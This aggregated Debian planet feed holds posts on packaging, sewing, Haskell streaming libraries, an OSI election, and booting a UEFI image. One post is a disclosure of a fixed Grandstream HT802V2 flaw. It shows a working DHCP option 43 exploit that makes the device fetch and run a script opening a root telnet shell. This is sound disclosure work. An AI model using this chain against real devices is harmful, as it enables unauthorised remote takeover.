 fixup_buildinfo mozc_2.29.5160.102+dfsg-1.dsc mozc_2.29.5160.102+dfsg-1_amd64.buildinfo
 signfile buildinfo mozc_2.29.5160.102+dfsg-1_amd64.buildinfo 719EB2D93DBE9C4D21FBA064F7FB75C566ED20E3

 fixup_changes dsc mozc_2.29.5160.102+dfsg-1.dsc mozc_2.29.5160.102+dfsg-1_source.changes
 fixup_changes buildinfo mozc_2.29.5160.102+dfsg-1_amd64.buildinfo mozc_2.29.5160.102+dfsg-1_source.changes
 signfile changes mozc_2.29.5160.102+dfsg-1_source.changes 719EB2D93DBE9C4D21FBA064F7FB75C566ED20E3

Successfully signed dsc, buildinfo, changes files
Uploading mozc_2.29.5160.102+dfsg-1.dsc
Uploading mozc_2.29.5160.102+dfsg-1.debian.tar.xz
Uploading mozc_2.29.5160.102+dfsg-1_amd64.buildinfo
Uploading mozc_2.29.5160.102+dfsg-1_source.changes

Mozc 2.29.5160.102+dfsg-1 landed in unstable on 2024-12-20.

Additional bug fixes

Additionally, the following bugs were fixed.

These bugs were fixed in 2.29.5160.102+dfsg-1.1.

Furthermore, I found that Salsa CI succeeds even when the pristine-tar branch commit is missing. I sent an MR for this issue, and it has already been merged.

Mozc and future in Debian

In this short journey, I gave up on updating to an even newer Mozc because the versions of its dependency libraries had not been updated.

Note that protobuf 3.25.4 on experimental depends on older absl 20230802, so it must be rebuilt against absl 20240722.0.

Moreover, we need to consider how to migrate from the GTK renderer to the Qt renderer in the future.

23 February, 2025 01:14PM

Valhalla's Things

Water Resistant Hood

Posted on February 23, 2025
Tags: madeof:atoms, craft:sewing, FreeSoftWear

a person wearing a relatively boxy water resistant jacket with pockets and a zipper, and a detached hood with a big square cowl that reaches mid-torso.

Many years ago I made myself a vest with lots of pockets 1 in a few layers of cheap cotton, and wore the hell out of it, for the added warmth, but most importantly for the convenience provided by the pockets.

the same person showing just the vest, with two applied pockets on the bust, closed with buttons, and two big flaps covering two welted pockets at waist level, plus a strip of fabric with loops where things may be attached.

Then a few years ago the cheap cotton had started to get worn, and I decided I needed to replace it. I found a second choice (and thus cheaper :) ) version of a water-repellent cotton and made another vest, lined with regular cotton, for a total of just two layers.

the same person, this time there are also two sleeves, attached to the vest with big snaps, the outline of which can be seen on the vest. they are significantly less faded than the vest.

This time I skipped a few pockets that I had found I didn’t use that much, and I didn’t add a hood, which didn’t play that well when worn over a hoodie, but I added some detached sleeves, for additional wind protection.

This left about 60 cm and some odd pieces of leftover fabric in my stash, for which I had no plan.

the hood pulled down on the back, showing the big square cowl.

And then February2 came, and I needed a quick, simple, mindless handsewing project for the first weekend; I saw the vest (which I’m wearing as much as the old one), the sleeves (which have been used much less, but I’d like to change this) and thought about making a matching hood for it, using my square hood pattern.

Since the etaproof is a bit stiff and not that nice to the touch, I decided to line3 it with the same cotton as the vest and sleeves, and in the style of the pattern I did so by finishing each panel with its own lining (with regular cotton thread) and then whipstitching the panels together with the corespun cotton/poly thread recommended by the seller of the fabric. I’m not sure this is the best way to construct something that is supposed to resist the rain, but if I notice issues I can always add some sealing tape afterwards.

I do have a waterproof cape to wear in case of real rain, so this is only supposed to work for light rain anyway, and it may prove not to be an issue.

As something designed to be worn in light rain, this is also something likely to be worn in low light conditions, where 100% black may not be the wisest look. On the vest I had added reflective piping to the armscyes, but I was out of the same piping.

from the front; a flash was used to take the picture, making the border of the cowl very visible.

I did however have a spool of reflector thread made of glass fibre by Rico Design, which I think was originally sold to be worked into knitting or crochet projects (it is now discontinued) and which I had never used.

I decided to try and sew a decorative blanket stitch border, a decision I had reasons to regret, since the thread broke and tangled like crazy, but in the end it was done, I like how it looks, and it seems pretty functional. I hope it won’t break with time and use, and if it does I’ll either fix it or try to redo with something else.

Of course, the day I finished sewing the reflective border it stopped raining, so I haven’t worn it yet, but I hope I’ll be able to, and if it is a horrible failure I’ll make sure to update this post.


  1. and I’ve just realized that I haven’t migrated that pattern to my pattern website, and I should do that. just don’t hold your breath for it to happen O:-). And for the time being it will not have step-by-step pictures, as I currently don’t need another vest.↩︎

  2. and February of course means a weekend in front of a screen that is showing a live-streamed conference.↩︎

  3. and of course I updated the pattern with instructions on how to add a lining.↩︎

23 February, 2025 12:00AM

February 21, 2025

hackergotchi for Jonathan Dowland

Jonathan Dowland

haskell streaming libraries

For my PhD, my colleagues/collaborators and I built a distributed stream-processing system using Haskell. There are several other Haskell stream-processing systems. How do they compare?

First, let's briefly discuss and define streaming in this context.

Structure and Interpretation of Computer Programs introduces Streams as an analogue of lists, to support delayed evaluation. In brief, the inductive list type (a list is either an empty list or a head element pre-pended to another list) is replaced with a structure with a head element and a promise which, when evaluated, will generate the tail (which in turn may have a head element and a promise to generate another tail, culminating in the equivalent of an empty list.) Later on SICP also covers lazy evaluation.

However, the streaming we're talking about originates in the relational community, rather than the functional one, and is subtly different. It's about building a pipeline of processing that receives and emits data but doesn't need to (indeed, cannot) reference the whole stream (which may be infinite) at once.
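
To make that concrete, here is a rough sketch of the pipeline idea in Python generators rather than Haskell (the concept is language-neutral): each stage receives and emits items one at a time, and no stage ever holds the whole, potentially infinite, stream in memory.

import itertools

def numbers():
    # An infinite source: the "whole stream" never exists at once.
    n = 0
    while True:
        yield n
        n += 1

def double(stream):
    # A processing stage: consumes and emits one item at a time.
    for x in stream:
        yield x * 2

pipeline = double(numbers())
print(list(itertools.islice(pipeline, 5)))  # [0, 2, 4, 6, 8]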

Haskell streaming systems

Now let's go over some Haskell streaming systems.

conduit (2011-)

Conduit is the oldest of the ones I am reviewing here, but I doubt it's the first in the Haskell ecosystem. If I've made any obvious omissions, please let me know!

Conduit provides a new set of types to model streaming data, and a completely new set of functions which are analogues of standard Prelude functions, e.g. sumC in place of sum. It provides its own combinator(s) such as .| (aka fuse), which is like composition but reads left-to-right.

The motivation for this is to enable (near?) constant memory usage for processing large streams of data -- presumably versus using a list-based approach -- and to provide some determinism: the README gives the example of "promptly closing file handles". I think this is another way of saying that it uses strict evaluation, or at least avoids lazy evaluation for some things.

Conduit offers interleaved effects: which is to say, IO can be performed mid-stream.

Conduit supports distributed operation via Data.Conduit.Network in the conduit-extra package. Michael Snoyman, principal Conduit author, wrote up how to use it here: https://www.yesodweb.com/blog/2014/03/network-conduit-async. To write a distributed Conduit application, the application programmer must manually determine the boundaries between the clients/servers and write specific code to connect them.

pipes (2012-)

The Pipes Tutorial contrasts itself with "Conventional Haskell stream programming": whether that means Conduit or something else, I don't know.

Paraphrasing their pitch: Effects, Streaming, Composability: pick two. That's the situation they describe for stream programming prior to Pipes. They argue Pipes offers all three.

Pipes offers its own combinators (which read left-to-right) and offers interleaved effects.

At this point I can't really see what fundamentally distinguishes Pipes from Conduit.

Pipes has some support for distributed operation via the sister library pipes-network. It looks like you must send and receive ByteStrings, which means rolling your own serialisation for other types. As with Conduit, to send or receive over a network, the application programmer must divide their program up into the sub-programs for each node, and add the necessary ingress/egress code.

io-streams (2013-)

io-streams emphasises simple primitives. Reading and writing is done under the IO Monad, thus, in an effectful (but non-pure) context. The presence or absence of further stream data is signalled by using the Maybe type (Just more data or Nothing: the producer has finished.)

It provides a library of functions that shadow the standard Prelude, such as S.fromList, S.mapM, etc.

It's not clear to me what the motivation for io-streams is, beyond providing a simple interface. There's no declaration of intent that I can find about (e.g.) constant-memory operation.

There's no mention of or support (that I can find) for distributed operation.

streaming (2015-)

Similar to io-streams, Streaming emphasises providing a simple interface that gels well with traditional Haskell methods. Streaming provides effectful streams (via a Monad -- any Monad?) and a collection of functions for manipulating streams which are designed to closely mimic standard Prelude (and Data.List) functions.

Streaming doesn't push its own combinators: the examples provided use $ and read right-to-left.

The motivation for Streaming seems to be to avoid memory leaks caused by extracting pure lists from IO with traditional functions like mapM, which require all the list constructors to be evaluated, the list to be completely deconstructed, and then a new list constructed.

Like io-streams, the focus of the library is providing a low-level streaming abstraction, and there is no support for distributed operation.

streamly (2017-)

Streamly appears to have the grand goal of providing a unified programming tool equally suited for quick-and-dirty programming tasks (normally the domain of scripting languages) and for high-performance work (C, Java, Rust, etc.). Their intended audience appears to be everyone, or at least not just existing Haskell programmers. See their rationale.

Streamly offers an interface to permit composing concurrent (note: not distributed) programs via combinators. It relies upon fusing a streaming pipeline to remove intermediate list structure allocations and de-allocations (i.e. deforestation, similar to GHC rewrite rules).

The examples I've seen use standard combinators (e.g. Control.Function.&, which reads left-to-right, and Applicative).

Streamly provide benchmarks versus Haskell pure lists, Streaming, Pipes and Conduit: these generally show Streamly several orders of magnitude faster.

I'm finding it hard to evaluate Streamly. It's big, and its focus is wide. It provides shadows of Prelude functions, as many of these libraries do.

wrap-up

It seems almost like it must be a rite-of-passage to write a streaming system in Haskell. Stones and glass houses, I'm guilty of that too.

The focus of the surveyed libraries is mostly on providing a streaming abstraction, normally with an analogous interface to standard Haskell lists. They differ on various philosophical points (whether to abstract away the mechanics behind type synonyms, how much to leverage existing Haskell idioms, etc). A few of the libraries have some rudimentary support for distributed operation, but this is limited to connecting separate nodes together: in some cases serialising data remains the application programmer's job, and in all cases the application programmer must manually carve up their processing according to a fixed idea of what nodes they are deploying to. They all define a fixed-function pipeline.

21 February, 2025 11:52AM

hackergotchi for Luke Faraone

Luke Faraone

I'm running for the OSI board... maybe

The Open Source Initiative has two classes of board seats: Affiliate seats, and Individual Member seats. 

In the upcoming election, each affiliate can nominate a candidate, and each affiliate can cast a vote for the Affiliate candidates, but there's only 1 Affiliate seat available. I initially expressed interest in being nominated as an Affiliate candidate via Debian. But since Bradley Kuhn is also running for an Affiliate seat with a similar platform to me, especially with regards to the OSAID, I decided to run as part of an aligned "ticket" as an Individual Member to avoid contention for the 1 Affiliate seat.

Bradley and I discussed running on a similar ticket around 8/9pm Pacific, and I submitted my candidacy around 9pm PT on 17 February. 

I was dismayed when I received the following mail from Nick Vidal:

Dear Luke,

Thank you for your interest in the OSI Board of Directors election. Unfortunately, we are unable to accept your application as it was submitted after the official deadline of Monday Feb 17 at 11:59 pm UTC. To ensure a fair process, we must adhere to the deadline for all candidates.

We appreciate your enthusiasm and encourage you to stay engaged with OSI’s mission. We hope you’ll consider applying in the future or contributing in other meaningful ways.

Best regards,
OSI Election Teams

Nowhere on the "OSI’s board of directors in 2025: details about the elections" page do they list a timezone for closure of nominations; they simply list Monday 17 February. 

The OSI's contact address is in California, so it seems arbitrary and capricious to retroactively define all of these processes as being governed by UTC.

Accordingly, I was not able to participate in the "potential board director" info sessions, but people who attended heard that the importance of accommodating differing timezones was discussed during the info session, and that OSI representatives mentioned they try to accommodate everyone's timezones. This seems in sharp contrast with the above policy.

I urge the OSI to reconsider this policy and allow me to stand for an Individual seat in the current cycle. 

21 February, 2025 10:35AM by Luke Faraone (noreply@blogger.com)

Reproducible Builds (diffoscope)

diffoscope 289 released

The diffoscope maintainers are pleased to announce the release of diffoscope version 289. This version includes the following changes:

[ Chris Lamb ]
* Catch CalledProcessError when calling html2text.
* Update copyright years.

You can find out more by visiting the project homepage.

21 February, 2025 12:00AM

Michael Ablassmeier

virtnbdbackup 2.21

Yesterday I released a new version of virtnbdbackup with a nice improvement.

The new version can now detect zeroed regions in the bitmaps by comparing the block regions against the state within the base bitmap during incremental backup.

This is helpful if virtual machines run fstrim, as it results in a smaller backup footprint. Before, the incremental backups could grow by the same amount as the fstrimmed data regions.

I also managed to enhance the tests by using the Arch Linux cloud images. The automated GitHub CI tests now actually test backups and restores against a virtual machine running a real OS.

21 February, 2025 12:00AM

February 20, 2025

hackergotchi for Dirk Eddelbuettel

Dirk Eddelbuettel

Rcpp now used by 3000 CRAN packages!

3000 Rcpp packages

As of today, Rcpp stands at 3001 reverse-dependencies on CRAN. The graph on the left depicts the growth of Rcpp usage (as measured by Depends, Imports and LinkingTo, but excluding Suggests) over time.

Rcpp was first released in November 2008. It took seven years to clear 500 packages in late October 2015, after which usage of R and Rcpp accelerated: 1000 packages in April 2017, 1500 packages in November 2018, 2000 packages in July 2020, and 2500 packages in February 2022. The chart extends to the very beginning via manually compiled data from CRANberries and checked with crandb. The core part of the data set is generated semi-automatically when updating a (manually curated) list of packages using Rcpp that is available too.

The Rcpp team aims to keep Rcpp as performant and reliable as it has been (and see e.g. here for more details). Last month’s 1.0.14 release post is a good example of the ongoing work. A really big shoutout and Thank You! to all users and contributors of Rcpp for help, suggestions, bug reports, documentation or, of course, code.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can sponsor me at GitHub.

20 February, 2025 09:14PM

hackergotchi for Paul Tagliamonte

Paul Tagliamonte

boot2kier

I can’t remember exactly the joke I was making at the time in my work’s slack instance (I’m sure it wasn’t particularly funny, though; and not even worth re-reading the thread to work out), but it wound up with me writing a UEFI binary for the punchline. Not to spoil the ending but it worked - no pesky kernel, no messing around with “userland”. I guess the only part of this you really need to know for the setup here is that it was a Severance joke, which is some fantastic TV. If you haven’t seen it, this post will seem perhaps weirder than it actually is. I promise I haven’t joined any new cults. For those who have seen it, the payoff to my joke is that I wanted my machine to boot directly to an image of Kier Eagan.

As for how to do it – I figured I’d give the uefi crate a shot, and see how it is to use, since this is a low stakes way of trying it out. In general, this isn’t the sort of thing I’d usually post about – except this wound up being easier and way cleaner than I thought it would be. That alone is worth sharing, in the hopes someone comes across this in the future and feels like they, too, can write something fun targeting the UEFI.

First things first – gotta create a rust project (I’ll leave that part to you depending on your life choices), and add the uefi crate to your Cargo.toml. You can either use cargo add or add a line like this by hand:

uefi = { version = "0.33", features = ["panic_handler", "alloc", "global_allocator"] }

We also need to teach cargo about how to go about building for the UEFI target, so we need to create a rust-toolchain.toml with one (or both) of the UEFI targets we’re interested in:

[toolchain]
targets = ["aarch64-unknown-uefi", "x86_64-unknown-uefi"]

Unfortunately, I wasn’t able to use the image crate, since it won’t build against the uefi target. This looks like it’s because rustc had no way to compile the required floating point operations within the image crate without hardware floating point instructions specifically. Rust tends to punt a lot of that to libm usually, so this isn’t entirely shocking given we’re no_std for a non-hardfloat target.

So-called “softening” requires a software floating point implementation that the compiler can use to “polyfill” (feels weird to use the term polyfill here, but I guess it’s spiritually right?) the lack of hardware floating point operations, which rust hasn’t implemented for this target yet. As a result, I changed tactics, and figured I’d use ImageMagick to pre-compute the pixels from a jpg, rather than doing it at runtime. A bit of a bummer, since I need to do more out of band pre-processing and hardcoding, and updating the image kinda sucks as a result – but it’s entirely manageable.

$ convert -resize 1280x900 kier.jpg kier.full.jpg
$ convert -depth 8 kier.full.jpg rgba:kier.bin

This will take our input file (kier.jpg), resize it to get as close to the desired resolution as possible while maintaining aspect ratio, then convert it from a jpg to a flat array of 4 byte RGBA pixels. Critically, it’s also important to remember that the size of the kier.full.jpg file may not actually be the requested size – it will not change the aspect ratio, so be sure to make a careful note of the resulting size of the kier.full.jpg file.
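
If you want to double-check the dimensions you ended up with, here’s a quick sketch of my own using Pillow (not part of the build itself):

# Prints (width, height) to hardcode as KIER_WIDTH / KIER_HEIGHT later.
from PIL import Image
print(Image.open("kier.full.jpg").size)  # e.g. (1280, 641)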

Last step with the image is to compile it into our Rust binary, since we don’t want to struggle with trying to read this off disk, which is thankfully real easy to do.

const KIER: &[u8] = include_bytes!("../kier.bin");
const KIER_WIDTH: usize = 1280;
const KIER_HEIGHT: usize = 641;
const KIER_PIXEL_SIZE: usize = 4;

Remember to use the width and height from the final kier.full.jpg file as the values for KIER_WIDTH and KIER_HEIGHT. KIER_PIXEL_SIZE is 4, since we have 4 byte wide values for each pixel as a result of our conversion step into RGBA. We’ll only use RGB, and if we ever drop the alpha channel, we can drop that down to 3. I don’t entirely know why I kept alpha around, but I figured it was fine. My kier.full.jpg image winds up shorter than the requested height (which is also qemu’s default resolution for me) – which means we’ll get a semi-annoying black band under the image when we go to run it – but it’ll work.

Anyway, now that we have our image as bytes, we can get down to work, and write the rest of the code to handle moving bytes around from in-memory as a flat block of pixels, and request that they be displayed using the UEFI GOP. We’ll just need to hack up a container for the image pixels and teach it how to blit to the display.

/// RGB Image to move around. This isn't the same as an
/// `image::RgbImage`, but we can associate the size of
/// the image along with the flat buffer of pixels.
struct RgbImage {
    /// Size of the image as a tuple, as the
    /// (width, height)
    size: (usize, usize),
    /// raw pixels we'll send to the display.
    inner: Vec<BltPixel>,
}

impl RgbImage {
    /// Create a new `RgbImage`.
    fn new(width: usize, height: usize) -> Self {
        RgbImage {
            size: (width, height),
            inner: vec![BltPixel::new(0, 0, 0); width * height],
        }
    }

    /// Take our pixels and request that the UEFI GOP
    /// display them for us.
    fn write(&self, gop: &mut GraphicsOutput) -> Result {
        gop.blt(BltOp::BufferToVideo {
            buffer: &self.inner,
            src: BltRegion::Full,
            dest: (0, 0),
            dims: self.size,
        })
    }
}

impl Index<(usize, usize)> for RgbImage {
    type Output = BltPixel;

    fn index(&self, idx: (usize, usize)) -> &BltPixel {
        let (x, y) = idx;
        &self.inner[y * self.size.0 + x]
    }
}

impl IndexMut<(usize, usize)> for RgbImage {
    fn index_mut(&mut self, idx: (usize, usize)) -> &mut BltPixel {
        let (x, y) = idx;
        &mut self.inner[y * self.size.0 + x]
    }
}

We also need to do some basic setup to get a handle to the UEFI GOP via the UEFI crate (using uefi::boot::get_handle_for_protocol and uefi::boot::open_protocol_exclusive for the GraphicsOutput protocol), so that we have the object we need to pass to RgbImage in order for it to write the pixels to the display. The only trick here is that the display on the booted system can really be any resolution – so we need to do some capping to ensure that we don’t write more pixels than the display can handle. Writing fewer than the display’s maximum seems fine, though.

fn praise() -> Result {
    let gop_handle = boot::get_handle_for_protocol::<GraphicsOutput>()?;
    let mut gop = boot::open_protocol_exclusive::<GraphicsOutput>(gop_handle)?;

    // Get the (width, height) that is the minimum of
    // our image and the display we're using.
    let (width, height) = gop.current_mode_info().resolution();
    let (width, height) = (width.min(KIER_WIDTH), height.min(KIER_HEIGHT));

    let mut buffer = RgbImage::new(width, height);
    for y in 0..height {
        for x in 0..width {
            let idx_r = ((y * KIER_WIDTH) + x) * KIER_PIXEL_SIZE;
            let pixel = &mut buffer[(x, y)];
            pixel.red = KIER[idx_r];
            pixel.green = KIER[idx_r + 1];
            pixel.blue = KIER[idx_r + 2];
        }
    }
    buffer.write(&mut gop)?;
    Ok(())
}

Not so bad! A bit tedious – we could solve some of this by turning KIER into an RgbImage at compile-time using some clever Cow and const tricks and implement blitting a sub-image of the image – but this will do for now. This is a joke, after all, let’s not go nuts. All that’s left with our code is for us to write our main function and try and boot the thing!

#[entry]
fn main() -> Status {
    uefi::helpers::init().unwrap();
    praise().unwrap();
    boot::stall(100_000_000);
    Status::SUCCESS
}

If you’re following along at home and so interested, the final source is over at gist.github.com. We can go ahead and build it using cargo (as is our tradition) by targeting the UEFI platform.

$ cargo build --release --target x86_64-unknown-uefi

Testing the UEFI Blob

While I can definitely get my machine to boot these blobs to test, I figured I’d save myself some time by using QEMU to test without a full boot. If you’ve not done this sort of thing before, we’ll need two packages, qemu and ovmf. It’s a bit different than most invocations of qemu you may see out there – so I figured it’d be worth writing this down, too.

$ doas apt install qemu-system-x86 ovmf

qemu has a nice feature where it’ll create us an EFI partition as a drive and attach it to the VM off a local directory – so let’s construct an EFI partition file structure, and drop our binary into the conventional location. If you haven’t done this before, and are only interested in running this in a VM, don’t worry too much about it, a lot of it is convention and this layout should work for you.

$ mkdir -p esp/efi/boot
$ cp target/x86_64-unknown-uefi/release/*.efi \
 esp/efi/boot/bootx64.efi

With all this in place, we can kick off qemu, booting it in UEFI mode using the ovmf firmware, attaching our EFI partition directory as a drive to our VM to boot off of.

$ qemu-system-x86_64 \
 -enable-kvm \
 -m 2048 \
 -smbios type=0,uefi=on \
 -bios /usr/share/ovmf/OVMF.fd \
 -drive format=raw,file=fat:rw:esp

If all goes well, soon you’ll be met with the all knowing gaze of Chosen One, Kier Eagan. The thing that really impressed me about all this is this program worked first try – it all went so boringly normal. Truly, kudos to the uefi crate maintainers, it’s incredibly well done.

Booting a live system

Sure, we could stop here, but anyone can open up an app window and see a picture of Kier Eagan, so I knew I needed to finish the job and boot a real machine up with this. In order to do that, we need to format a USB stick. BE SURE /dev/sda IS CORRECT IF YOU’RE COPY AND PASTING. All my drives are NVMe, so BE CAREFUL – if you use SATA, it may very well be your hard drive! Please do not destroy your computer over this.

$ doas fdisk /dev/sda
Welcome to fdisk (util-linux 2.40.4).
Changes will remain in memory only, until you decide to write them.
Be careful before using the write command.
Command (m for help): n
Partition type
p primary (0 primary, 0 extended, 4 free)
e extended (container for logical partitions)
Select (default p): p
Partition number (1-4, default 1):
First sector (2048-4014079, default 2048):
Last sector, +/-sectors or +/-size{K,M,G,T,P} (2048-4014079, default 4014079):
Created a new partition 1 of type 'Linux' and of size 1.9 GiB.
Command (m for help): t
Selected partition 1
Hex code or alias (type L to list all): ef
Changed type of partition 'Linux' to 'EFI (FAT-12/16/32)'.
Command (m for help): w
The partition table has been altered.
Calling ioctl() to re-read partition table.
Syncing disks.

Once that looks good (depending on your flavor of udev you may or may not need to unplug and replug your USB stick), we can go ahead and format our new EFI partition (BE CAREFUL THAT /dev/sda IS YOUR USB STICK) and write our EFI directory to it.

$ doas mkfs.fat /dev/sda1
$ doas mount /dev/sda1 /mnt
$ cp -r esp/efi /mnt
$ find /mnt
/mnt
/mnt/efi
/mnt/efi/boot
/mnt/efi/boot/bootx64.efi

Of course, naturally, devotion to Kier shouldn’t mean backdooring your system. Disabling Secure Boot runs counter to the Core Principals, such as Probity, and not doing this would surely run counter to Verve, Wit and Vision. This bit does require that you’ve taken the step to enroll a MOK and know how to use it, right about now is when we can use sbsign to sign our UEFI binary we want to boot from to continue enforcing Secure Boot. The details for how this command should be run specifically is likely something you’ll need to work out depending on how you’ve decided to manage your MOK.

$ doas sbsign \
 --cert /path/to/mok.crt \
 --key /path/to/mok.key \
 target/x86_64-unknown-uefi/release/*.efi \
 --output esp/efi/boot/bootx64.efi

I figured I’d leave a signed copy of boot2kier at /boot/efi/EFI/BOOT/KIER.efi on my Dell XPS 13, with Secure Boot enabled and enforcing, just took a matter of going into my BIOS to add the right boot option, which was no sweat. I’m sure there is a way to do it using efibootmgr, but I wasn’t smart enough to do that quickly. I let ‘er rip, and it booted up and worked great!

It was a bit hard to get a video of my laptop, though – but lucky for me, I have a Minisforum Z83-F sitting around (which, until a few weeks ago was running the annual http server to control my christmas tree ) – so I grabbed it out of the christmas bin, wired it up to a video capture card I have sitting around, and figured I’d grab a video of me booting a physical device off the boot2kier USB stick.

Attentive readers will notice the image of Kier is smaller than the qemu booted system – which just means our real machine has a larger GOP display resolution than qemu, which makes sense! We could write some fancy resize code (sounds annoying), center the image (can’t be assed but should be the easy way out here) or resize the original image (pretty hardware specific workaround). Additionally, you can make out the image being written to the display before us (the Minisforum logo) behind Kier, which is really cool stuff. If we were real fancy we could write blank pixels to the display before blitting Kier, but, again, I don’t think I care to do that much work.

But now I must away

If I wanted to keep this joke going, I’d likely try and find a copy of the original video when Helly 100%s her file and boot into that – or maybe play a terrible midi PC speaker rendition of Kier, Chosen One, Kier after rendering the image. I, unfortunately, don’t have any friends involved with production (yet?), so I reckon all that’s out for now. I’ll likely stop playing with this – the joke was done and I’m only writing this post because of how great everything was along the way.

All in all, this reminds me so much of building a homebrew kernel to boot a system into – but like, good, though, and it’s a nice reminder of both how fun this stuff can be, and how far we’ve come. UEFI protocols are light-years better than how we did it in the dark ages, and the tooling for this is SO much more mature. Booting a custom UEFI binary is miles ahead of trying to boot your own kernel, and I can’t believe how good the uefi crate is specifically.

Praise Kier! Kudos, to everyone involved in making this so delightful ❤️.

20 February, 2025 02:40PM

hackergotchi for Evgeni Golov

Evgeni Golov

Unauthenticated RCE in Grandstream HT802V2 and probably others using gs_test_server DHCP vendor option

The Grandstream HT802V2 uses busybox' udhcpc for DHCP. When a DHCP event occurs, udhcpc calls a script (/usr/share/udhcpc/default.script by default) to further process the received data. On the HT802V2 this is used to (among other things) parse the data in DHCP option 43 (vendor) using the Grandstream-specific parser /sbin/parse_vendor.


        [ -n "$vendor" ] && {
                VENDOR_TEST_SERVER="`echo $vendor | parse_vendor | grep gs_test_server | cut -d' ' -f2`"
                if [ -n "$VENDOR_TEST_SERVER" ]; then
                        /app/bin/vendor_test_suite.sh $VENDOR_TEST_SERVER
                fi

According to the documentation the format is <option_code><value_length><value>. The only documented option code is 0x01 for the ACS URL. However, if you pass other codes, these are accepted and parsed too. Especially, if you pass 0x05 you get gs_test_server, which is passed in a call to /app/bin/vendor_test_suite.sh.
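
To illustrate how that format decodes, here is a small Python sketch of such a TLV parser (my own toy version for illustration; the device uses its own /sbin/parse_vendor binary):

def parse_vendor(data: bytes) -> dict:
    """Walk <option_code><value_length><value> records."""
    opts = {}
    i = 0
    while i + 2 <= len(data):
        code, length = data[i], data[i + 1]
        opts[code] = data[i + 2:i + 2 + length]
        i += 2 + length
    return opts

# 0x01 would be the documented ACS URL; 0x05 yields gs_test_server.
print(parse_vendor(bytes([0x05, 14]) + b"192.168.42.222"))
# {5: b'192.168.42.222'}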

What's /app/bin/vendor_test_suite.sh? It's this nice script:

#!/bin/sh

TEST_SCRIPT=vendor_test.sh
TEST_SERVER=$1
TEST_SERVER_PORT=8080

cd /tmp

wget -q -t 2 -T 5 http://${TEST_SERVER}:${TEST_SERVER_PORT}/${TEST_SCRIPT} 
if [ "$?" = "0" ]; then
    echo "Finished downloading ${TEST_SCRIPT} from http://${TEST_SERVER}:${TEST_SERVER_PORT}"
    chmod +x ${TEST_SCRIPT}
        corefile_dec ${TEST_SCRIPT}
        if [ "`head -n 1 ${TEST_SCRIPT}`" = "#!/bin/sh" ]; then
                echo "Starting GS Test Suite..."
                ./${TEST_SCRIPT} http://${TEST_SERVER}:${TEST_SERVER_PORT}
        fi
fi

It uses the passed value to construct the URL http://<gs_test_server>:8080/vendor_test.sh and download it using wget. We could probably construct a gs_test_server value in a way that makes wget overwrite some system file, as was suggested in CVE-2021-37915. But we can also just let the script download the file and execute it for us. The only hurdle is that the downloaded file gets decrypted using corefile_dec, and the result needs to have #!/bin/sh as the first line to be executed.

I have no idea how the encryption works. But luckily we already have a shell using the OpenVPN exploit and can use /bin/encfile to encrypt things! The result gets correctly decrypted by corefile_dec back to the needed payload.

That means we can take a simple payload like:

#!/bin/sh
# you need exactly that shebang, yes

telnetd -l /bin/sh -p 1270 &

Encrypt it using encfile and place it on a webserver as vendor_test.sh.

The test machine has the IP 192.168.42.222 and python3 -m http.server 8080 runs the webserver on the right port.

This means the value of DHCP option 43 needs to be 05 (the gs_test_server sub-option code), 14 (the length of the IP address string), followed by 192.168.42.222 itself.

In Python:

>>> server = "192.168.42.222"
>>> ":".join([f'{y:02x}' for y in [5, len(server)] + [ord(x) for x in server]])
'05:0e:31:39:32:2e:31:36:38:2e:34:32:2e:32:32:32'

So we set DHCP option 43 to 05:0e:31:39:32:2e:31:36:38:2e:34:32:2e:32:32:32 and trigger a DHCP run (/etc/init.d/udhcpc restart if you have a shell, or a plain reboot if you don't). And boom, root shell on port 1270 :)

As mentioned earlier, this is closely related to CVE-2021-37915, where a binary was downloaded via TFTP from the gdb_debug_server NVRAM variable or via HTTP from the gs_test_server NVRAM variable. Both of these variables were controllable using the existing gs_config interface after authentication. But using DHCP for the same thing is much nicer, as it removes the need for authentication completely :)

Affected devices

  • HT802V2 running 1.0.3.5 (and any other release older than 1.0.3.10), as that's what I have tested
  • Most probably also other HT8xxV2, as they use the same firmware
  • Most probably also HT8xx(V1), as their /usr/share/udhcpc/default.script and /app/bin/vendor_test_suite.sh look very similar, according to firmware dumps

Fix

After disclosing this issue to Grandstream, they have issued a new firmware release (1.0.3.10) which modifies /app/bin/vendor_test_suite.sh to

#!/bin/sh

TEST_SCRIPT=vendor_test.sh
TEST_SERVER=$1
TEST_SERVER_PORT=8080
VENDOR_SCRIPT="/tmp/run_vendor.sh"

cd /tmp

wget -q -t 2 -T 5 http://${TEST_SERVER}:${TEST_SERVER_PORT}/${TEST_SCRIPT} 
if [ "$?" = "0" ]; then
    echo "Finished downloading ${TEST_SCRIPT} from http://${TEST_SERVER}:${TEST_SERVER_PORT}"
    chmod +x ${TEST_SCRIPT}
    prov_image_dec --in ${TEST_SCRIPT} --out ${VENDOR_SCRIPT}
    if [ "`head -n 1 ${VENDOR_SCRIPT}`" = "#!/bin/sh" ]; then
        echo "Starting GS Test Suite..."
        chmod +x ${VENDOR_SCRIPT}
        ${VENDOR_SCRIPT} http://${TEST_SERVER}:${TEST_SERVER_PORT}
    fi
fi

The crucial part is that now prov_image_dec is used for the decoding, which actually checks for a signature (like on the firmware image itself), thus preventing loading of malicious scripts.

Timeline

20 February, 2025 11:38AM by evgeni

February 19, 2025

Scarlett Gately Moore

KDE Snaps are broken, sorry lights out for now

All core22 KDE snaps are broken. There is no easy fix. We have used kde-neon repos since inception and haven't had issues until now.

libEGL fatal: DRI driver not from this Mesa build (‘23.2.1-1ubuntu3.1~22.04.3’ vs ‘23.2.1-1ubuntu3.1~22.04.2’)

Apparently Jammy had a mesa update?

Option 1: Rebuild our entire stack without neon repos (fails due to dependencies not in Jammy; would require tracking down all of these and building them from source)

Option 2: Finish the transition to core24 (this is an enormous task and will still take some time)

Either option will take more time and effort than I have. I need to be job hunting as I have run out of resources to pay my bills. My internet/phone will be cut off in days. I am beyond stressed out and getting snippy with folks, for that I apologize. If someone wants to sponsor the above work then please donate to https://gofund.me/fe30793b otherwise I am stepping away to rethink life and my defunct career.

I am truly sorry everyone.

New core24 Snaps:

Arianna – Epub viewer

k3b – Disc burner

Snapcraft:

Fixes for the qt5 kde-neon extension

https://github.com/canonical/snapcraft/pull/5261

19 February, 2025 02:17PM by sgmoore

hackergotchi for Thomas Lange

Thomas Lange

The secret maze of Debian images

TL;DR

